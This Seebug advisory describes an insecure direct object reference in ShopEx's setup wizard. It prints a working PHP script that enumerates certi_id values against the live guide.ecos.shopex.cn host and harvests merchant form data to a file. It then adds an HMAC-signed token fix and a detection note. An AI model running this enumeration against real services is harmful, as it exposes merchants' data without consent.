ShopEx interface flaw allows enumerating all user websites

2013-08-07T00:00:00
ID SSV:93455
Type seebug
Reporter Root
Modified 2013-08-07T00:00:00

Description

Summary:

A flaw in a ShopEx interface allows every site using ShopEx to be enumerated.

Details:

The problem is in the ShopEx store setup wizard page http://guide.ecos.shopex.cn/step2.php?refer=eyJjZXJ0aV9pZCI6MTA1MSwiY2FsbGJhY2tfdXJsIjoiaHR0cDpcL1wvd3d3LmVrYWlkaWFuLmNvbVwvIn0= . The refer parameter base64-decodes to {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}. By changing certi_id we can enumerate every website that uses the ShopEx software.

<?php
for ($i = 1; $i < 10000; $i++) { // enumerate certi_id values
    ShowshopExD($i);
}

function ShowshopExD($cid) {
    $url = 'http://guide.ecos.shopex.cn/step2.php';
    // Unsigned token: only certi_id changes between requests
    $refer = base64_encode('{"certi_id":' . intval($cid) . ',"callback_url":"http:\/\/www.a.com\/"}');
    $url = $url . '?refer=' . $refer;
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    $result = curl_exec($ch);
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");
    if (strpos($result, $refer)) {
        $fp = fopen("c:/shopEx.txt", 'ab'); // save results to file
        // Pull the prefilled text inputs (name/value pairs) out of the page
        preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
        foreach ($value[1] as $key) {
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($key), $res);
            echo $res[1][0] . ':' . $res[3][0] . "\r\n";
            $col = $res[1][0] . ':' . $res[3][0] . "\r\n";
            fwrite($fp, $col, strlen($col));
        }
        echo '--------------------------------' . "\r\n";
        fclose($fp);
    }
    flush();
    curl_close($ch);
}
?>
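The root cause is that refer is a plain base64 JSON blob the client can rewrite, so certi_id is an unchecked direct object reference. A hardened token design for the same wizard flow, as an added example that is not ShopEx's code: the payload is HMAC-signed so certi_id cannot be altered client-side, and step2 additionally ties the id to the logged-in merchant. The key, the helper names and the session field are assumptions.

```php
<?php
// Added example, not ShopEx code. REFER_KEY is a placeholder secret that
// would live in server-side configuration, never in the page or the URL.
const REFER_KEY = 'replace-with-a-long-random-secret';

// Build the token the wizard hands to step2.php: base64(JSON payload . HMAC).
function make_refer(int $certiId, string $callbackUrl): string {
    $payload = json_encode(['certi_id' => $certiId, 'callback_url' => $callbackUrl]);
    $sig = hash_hmac('sha256', $payload, REFER_KEY);
    return base64_encode($payload . '.' . $sig);
}

// Verify and decode a token; returns the payload array, or null if the
// token is malformed or its signature does not match (i.e. it was edited).
function verify_refer(string $token): ?array {
    $raw = base64_decode($token, true);
    if ($raw === false || strrpos($raw, '.') === false) {
        return null;
    }
    $pos = strrpos($raw, '.');           // hex HMAC never contains '.', URL may
    $payload = substr($raw, 0, $pos);
    $sig = substr($raw, $pos + 1);
    // Constant-time comparison so the check does not leak the signature.
    if (!hash_equals(hash_hmac('sha256', $payload, REFER_KEY), $sig)) {
        return null;
    }
    $data = json_decode($payload, true);
    if (!is_array($data) || !isset($data['certi_id'], $data['callback_url'])) {
        return null;
    }
    return $data;
}

// step2.php should also refuse ids that do not belong to the current session
// (the merchant's certi_id stored at login is an assumed session field), so
// even a validly signed token cannot be replayed against another account.
function authorize_step2(string $token, int $sessionCertiId): ?array {
    $data = verify_refer($token);
    if ($data === null || (int) $data['certi_id'] !== $sessionCertiId) {
        return null;
    }
    return $data;
}

// Demonstration: a signed token verifies, a hand-built unsigned one
// in the original format (the kind the report enumerates) is rejected.
$good = make_refer(1051, 'http://www.example.com/');
var_dump(verify_refer($good) !== null);
$forged = base64_encode('{"certi_id":1052,"callback_url":"http:\/\/www.example.com\/"}');
var_dump(verify_refer($forged) === null);
var_dump(authorize_step2($good, 1052) === null);
```

On the detection side, the same endpoint can be watched for many requests whose decoded refer differs only in certi_id from a single client, which is the traffic pattern the enumeration script above produces.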

Proof of vulnerability:

[Screenshot QQ截图20130807100758.jpg: https://images.seebug.org/upload/201308/07100834baff87bc53a37f99e4b7fb73448f5ab9.jpg]